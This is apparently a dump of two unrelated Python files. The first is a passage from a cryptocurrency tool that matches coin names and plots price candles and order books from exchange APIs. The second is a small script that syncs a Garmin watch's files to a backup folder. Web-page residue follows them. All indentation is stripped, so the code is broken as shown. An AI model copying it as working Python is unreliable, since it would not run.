sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
df = df.merge(coins, on=key)
else:
console.print(
"Couldn't execute find methods for CoinPaprika, Binance, Coinbase or CoinGecko\n"
)
df = pd.DataFrame()
print_rich_table(
df, headers=list(df.columns), show_index=False, title="Similar Coins"
)
console.print("")
export_data(
export,
os.path.dirname(os.path.abspath(__file__)),
"find",
df,
)
def display_all_coins(
source: str, coin: str, top: int, skip: int, show_all: bool, export: str
) -> None:
"""Find similar coin by coin name,symbol or id.
If you don't remember exact name or id of the Coin at CoinGecko, CoinPaprika, Coinbase, Binance
you can use this command to display coins with similar name, symbol or id to your search query.
Example of usage: coin name is something like "polka". So I can try: find -c polka -k name -t 25
It will search for coin that has similar name to polka and display top 25 matches.
-c, --coin stands for coin - you provide here your search query
-t, --top it displays top N number of records.
Parameters
----------
top: int
Number of records to display
coin: str
Cryptocurrency
source: str
Data source of coins. CoinGecko (cg) or CoinPaprika (cp) or Binance (bin), Coinbase (cb)
skip: int
Skip N number of records
show_all: bool
Flag to show all sources of data
export : str
Export dataframe data to csv,json,xlsx file
"""
sources = ["cg", "cp", "bin", "cb"]
limit, cutoff = 30, 0.75
coins_func_map = {
"cg": get_coin_list,
"cp": get_list_of_coins,
"bin": load_binance_map,
"cb": load_coinbase_map,
}
if show_all:
coins_func = coins_func_map.get(source)
if coins_func:
df = coins_func()
else:
df = prepare_all_coins_df()
elif not source or source not in sources:
df = prepare_all_coins_df()
cg_coins_list = df["CoinGecko"].to_list()
sim = difflib.get_close_matches(coin.lower(), cg_coins_list, limit, cutoff)
df_matched = pd.Series(sim).to_frame().reset_index()
df_matched.columns = ["index", "CoinGecko"]
df = df.merge(df_matched, on="CoinGecko")
df.drop("index", axis=1, inplace=True)
else:
if source == "cg":
coins_df = get_coin_list().drop("index", axis=1)
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "id", "name"]]
elif source == "cp":
coins_df = get_list_of_coins()
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "id", "name"]]
elif source == "bin":
coins_df_gecko = get_coin_list()
coins_df_bin = load_binance_map()
coins_df_bin.columns = ["symbol", "id"]
coins_df = pd.merge(
coins_df_bin, coins_df_gecko[["id", "name"]], how="left", on="id"
)
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "symbol", "name"]]
df.columns = ["index", "id", "name"]
elif source == "cb":
coins_df_gecko = get_coin_list()
coins_df_cb = load_coinbase_map()
coins_df_cb.columns = ["symbol", "id"]
coins_df = pd.merge(
coins_df_cb, coins_df_gecko[["id", "name"]], how="left", on="id"
)
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "symbol", "name"]]
df.columns = ["index", "id", "name"]
else:
df = pd.DataFrame(columns=["index", "id", "symbol"])
console.print("Couldn't find any coins")
console.print("")
try:
df = df[skip : skip + top] # noqa
except Exception as e:
logger.exception(str(e))
console.print(e)
print_rich_table(
df.fillna("N/A"),
headers=list(df.columns),
show_index=False,
title="Similar Coins",
)
export_data(
export,
os.path.dirname(os.path.abspath(__file__)),
"coins",
df,
)
def load_ta_data(
coin_map_df: pd.DataFrame, source: str, currency: str, **kwargs: Any
) -> Tuple[pd.DataFrame, str]:
"""Load data for Technical Analysis
Parameters
----------
coin_map_df: pd.DataFrame
Cryptocurrency
source: str
Source of data: CoinGecko, Binance, CoinPaprika
currency: str
Quotes currency
kwargs:
days: int
Days limit for coingecko, coinpaprika
limit: int
Limit for binance quotes
interval: str
Time interval for Binance
Returns
----------
Tuple[pd.DataFrame, str]
df with prices
quoted currency
"""
limit = kwargs.get("limit", 100)
interval = kwargs.get("interval", "1day")
days = kwargs.get("days", 30)
if source == "bin":
client = Client(cfg.API_BINANCE_KEY, cfg.API_BINANCE_SECRET)
interval_map = {
"1day": client.KLINE_INTERVAL_1DAY,
"3day": client.KLINE_INTERVAL_3DAY,
"1hour": client.KLINE_INTERVAL_1HOUR,
"2hour": client.KLINE_INTERVAL_2HOUR,
"4hour": client.KLINE_INTERVAL_4HOUR,
"6hour": client.KLINE_INTERVAL_6HOUR,
"8hour": client.KLINE_INTERVAL_8HOUR,
"12hour": client.KLINE_INTERVAL_12HOUR,
"1week": client.KLINE_INTERVAL_1WEEK,
"1min": client.KLINE_INTERVAL_1MINUTE,
"3min": client.KLINE_INTERVAL_3MINUTE,
"5min": client.KLINE_INTERVAL_5MINUTE,
"15min": client.KLINE_INTERVAL_15MINUTE,
"30min": client.KLINE_INTERVAL_30MINUTE,
"1month": client.KLINE_INTERVAL_1MONTH,
}
symbol_binance = coin_map_df["Binance"]
pair = symbol_binance + currency.upper()
if check_valid_binance_str(pair):
# console.print(f"{symbol_binance} loaded vs {currency.upper()}")
candles = client.get_klines(
symbol=pair,
interval=interval_map[interval],
limit=limit,
)
candles_df = pd.DataFrame(candles).astype(float).iloc[:, :6]
candles_df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df_coin = candles_df.set_index(
pd.to_datetime(candles_df["date"], unit="ms")
).drop("date", axis=1)
return df_coin, currency
return pd.DataFrame(), currency
if source == "cp":
symbol_coinpaprika = coin_map_df["CoinPaprika"]
df = coinpaprika_model.get_ohlc_historical(
symbol_coinpaprika, currency.upper(), days
)
if df.empty:
console.print("No data found", "\n")
return pd.DataFrame(), ""
df.drop(["time_close", "market_cap"], axis=1, inplace=True)
df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df = df.set_index(pd.to_datetime(df["date"])).drop("date", axis=1)
return df, currency
if source == "cg":
coin_id = coin_map_df["CoinGecko"]
# coin = pycoingecko_model.Coin(symbol_coingecko)
df = pycoingecko_model.get_coin_market_chart(coin_id, currency, days)
df = df["price"].resample("1D").ohlc().ffill()
df.columns = [
"Open",
"High",
"Low",
"Close",
]
df.index.name = "date"
return df, currency
if source == "cb":
symbol_coinbase = coin_map_df["Coinbase"]
coin, currency = symbol_coinbase.upper(), currency.upper()
pair = f"{coin}-{currency}"
if coinbase_model.check_validity_of_product(pair):
# console.print(f"{coin} loaded vs {currency}")
df = coinbase_model.get_candles(
product_id=pair,
interval=interval or "24hour",
).head(limit)
df_coin = df.set_index(pd.to_datetime(df["date"], unit="s")).drop(
"date", axis=1
)
return df_coin[::-1], currency
return pd.DataFrame(), currency
def plot_chart(
coin_map_df: pd.DataFrame, source: str, currency: str, **kwargs: Any
) -> None:
"""Load data for Technical Analysis
Parameters
----------
coin_map_df: pd.DataFrame
Cryptocurrency
source: str
Source of data: CoinGecko, Binance, CoinPaprika
currency: str
Quotes currency
kwargs:
days: int
Days limit for coingecko, coinpaprika
limit: int
Limit for binance quotes
interval: str
Time interval for Binance
Returns
----------
Tuple[pd.DataFrame, str]
dataframe with prices
quoted currency
"""
limit = kwargs.get("limit", 100)
interval = kwargs.get("interval", "1day")
days = kwargs.get("days", 30)
if source == "bin":
client = Client(cfg.API_BINANCE_KEY, cfg.API_BINANCE_SECRET)
interval_map = {
"1day": client.KLINE_INTERVAL_1DAY,
"3day": client.KLINE_INTERVAL_3DAY,
"1hour": client.KLINE_INTERVAL_1HOUR,
"2hour": client.KLINE_INTERVAL_2HOUR,
"4hour": client.KLINE_INTERVAL_4HOUR,
"6hour": client.KLINE_INTERVAL_6HOUR,
"8hour": client.KLINE_INTERVAL_8HOUR,
"12hour": client.KLINE_INTERVAL_12HOUR,
"1week": client.KLINE_INTERVAL_1WEEK,
"1min": client.KLINE_INTERVAL_1MINUTE,
"3min": client.KLINE_INTERVAL_3MINUTE,
"5min": client.KLINE_INTERVAL_5MINUTE,
"15min": client.KLINE_INTERVAL_15MINUTE,
"30min": client.KLINE_INTERVAL_30MINUTE,
"1month": client.KLINE_INTERVAL_1MONTH,
}
symbol_binance = coin_map_df["Binance"]
pair = symbol_binance + currency
if check_valid_binance_str(pair):
# console.print(f"{symbol_binance} loaded vs {currency.upper()}")
candles = client.get_klines(
symbol=pair,
interval=interval_map[interval],
limit=limit,
)
candles_df = pd.DataFrame(candles).astype(float).iloc[:, :6]
candles_df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df_coin = candles_df.set_index(
pd.to_datetime(candles_df["date"], unit="ms")
).drop("date", axis=1)
title = f"{symbol_binance + currency} from {df_coin.index[0].strftime('%Y/%m/%d')} to {df_coin.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
plot_candles(
candles_df=df_coin,
title=title,
volume=True,
)
if source == "cp":
symbol_coinpaprika = coin_map_df["CoinPaprika"]
df = coinpaprika_model.get_ohlc_historical(
str(symbol_coinpaprika), currency.upper(), days
)
if df.empty:
console.print("There is not data to plot chart\n")
return
df.drop(["time_close", "market_cap"], axis=1, inplace=True)
df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df = df.set_index(pd.to_datetime(df["date"])).drop("date", axis=1)
title = f"{symbol_coinpaprika}/{currency} from {df.index[0].strftime('%Y/%m/%d')} to {df.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
df["Volume"] = df["Volume"] / 1_000_000
plot_candles(
candles_df=df,
title=title,
volume=True,
ylabel="Volume [1M]",
)
console.print("")
if source == "cg":
symbol_coingecko = coin_map_df["CoinGecko"]
coin = pycoingecko_model.Coin(symbol_coingecko)
df = coin.get_coin_market_chart(currency, days)
df = df["price"].resample("1D").ohlc().ffill()
df.columns = [
"Open",
"High",
"Low",
"Close",
]
title = f"{symbol_coingecko}/{currency} from {df.index[0].strftime('%Y/%m/%d')} to {df.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
plot_candles(
candles_df=df,
title=title,
volume=False,
ylabel="Volume [1M]",
)
console.print("")
if source == "cb":
symbol_coinbase = coin_map_df["Coinbase"]
coin, currency = symbol_coinbase.upper(), currency.upper()
pair = f"{coin}-{currency}"
if coinbase_model.check_validity_of_product(pair):
df = coinbase_model.get_candles(
product_id=pair,
interval=interval or "24hour",
).head(limit)
df = df.astype(float).iloc[:, :6]
df.sort_values(by="date", inplace=True, ascending=True)
df = df.set_index(pd.to_datetime(df["date"], unit="s")).drop("date", axis=1)
title = f"{coin}/{currency} from {df.index[0].strftime('%Y/%m/%d')} to {df.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
df["Volume"] = df["Volume"] / 1_000
plot_candles(
candles_df=df,
title=title,
volume=True,
ylabel="Volume [1K]",
)
console.print("")
def plot_candles(
candles_df: pd.DataFrame,
volume: bool,
ylabel: str = "",
title: str = "",
external_axes: Optional[List[plt.Axes]] = None,
) -> None:
"""Plot candle chart from dataframe. [Source: Binance]
Parameters
----------
candles_df: pd.DataFrame
Dataframe containing time and OHLCV
title: str
title of graph
external_axes : Optional[List[plt.Axes]], optional
External axes (1 axis is expected in the list), by default None
"""
candle_chart_kwargs = {
"type": "candle",
"style": theme.mpf_style,
"volume": volume,
"xrotation": theme.xticks_rotation,
"ylabel_lower": ylabel,
"scale_padding": {"left": 0.3, "right": 1, "top": 0.8, "bottom": 0.8},
"update_width_config": {
"candle_linewidth": 0.6,
"candle_width": 0.8,
"volume_linewidth": 0.8,
"volume_width": 0.8,
},
"warn_too_much_data": 10000,
}
# This plot has 2 axes
if not external_axes:
candle_chart_kwargs["returnfig"] = True
candle_chart_kwargs["figratio"] = (10, 7)
candle_chart_kwargs["figscale"] = 1.10
candle_chart_kwargs["figsize"] = plot_autoscale()
fig, _ = mpf.plot(candles_df, **candle_chart_kwargs)
fig.suptitle(
f"\n{title}",
horizontalalignment="left",
verticalalignment="top",
x=0.05,
y=1,
)
theme.visualize_output(force_tight_layout=False)
else:
nr_external_axes = 2 if volume else 1
if len(external_axes) != nr_external_axes:
logger.error("Expected list of %s axis items.", str(nr_external_axes))
console.print(
f"[red]Expected list of {nr_external_axes} axis items./n[/red]"
)
return
if volume:
(ax, volume) = external_axes
candle_chart_kwargs["volume"] = volume
else:
ax = external_axes
candle_chart_kwargs["ax"] = ax
mpf.plot(candles_df, **candle_chart_kwargs)
def plot_order_book(
bids: np.ndarray,
asks: np.ndarray,
coin: str,
external_axes: Optional[List[plt.Axes]] = None,
) -> None:
"""
Plots Bid/Ask. Can be used for Coinbase and Binance
Parameters
----------
bids : np.array
array of bids with columns: price, size, cumulative size
asks : np.array
array of asks with columns: price, size, cumulative size
coin : str
Coin being plotted
external_axes : Optional[List[plt.Axes]], optional
External axes (1 axis is expected in the list), by default None
"""
# This plot has 1 axis
if external_axes is None:
_, ax = plt.subplots(figsize=plot_autoscale(), dpi=PLOT_DPI)
else:
if len(external_axes) != 1:
logger.error("Expected list of one axis item.")
console.print("[red]Expected list of one axis item./n[/red]")
return
(ax,) = external_axes
ax.plot(bids[:, 0], bids[:, 2], color=theme.up_color, label="bids")
ax.fill_between(bids[:, 0], bids[:, 2], color=theme.up_color, alpha=0.4)
ax.plot(asks[:, 0], asks[:, 2], color=theme.down_color, label="asks")
ax.fill_between(asks[:, 0], asks[:, 2], color=theme.down_color, alpha=0.4)
ax.legend()
ax.set_xlabel("Price")
ax.set_ylabel("Size (Coins)")
ax.set_title(f"Order Book for {coin}")
theme.style_primary_axis(ax)
if external_axes is None:
theme.visualize_output(force_tight_layout=False)
|
the-stack_106_19156
|
from dirsync import sync
from os import system
import configparser
import pyudev
import psutil
#configuration file
config = configparser.ConfigParser()
config.read('config.ini')
class synchronise:
def local_(garmin, back_folder_name): #Include Garmin watch mount point, back-up folder location
sync(garmin+"/GARMIN", back_folder_name, 'sync', purge = False, create=True)
#os.system("find . -type d | cpio -pdvm ../converted/")
def cloud_(garmin):
print("This is the cloud sync function")
print(garmin)
def rasp_(self):
print("This is the raspberyy sync function")
class mountpoint:
def mount_point(device_node):
for partitions in psutil.disk_partitions():
if partitions.device == device_node:
return partitions.mountpoint
def get(): #asynchronous port scan
context = pyudev.Context()
for device in context.list_devices(subsystem='block'):
if device.get('ID_FS_LABEL') == config['credential']['ID_FS_LABEL']:
return mountpoint.mount_point(device.device_node)
else:
break
if __name__ == "__main__":
if mountpoint.get() == None:
pass
else:
synchronise.local_(mountpoint.get(), "../data/raw")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.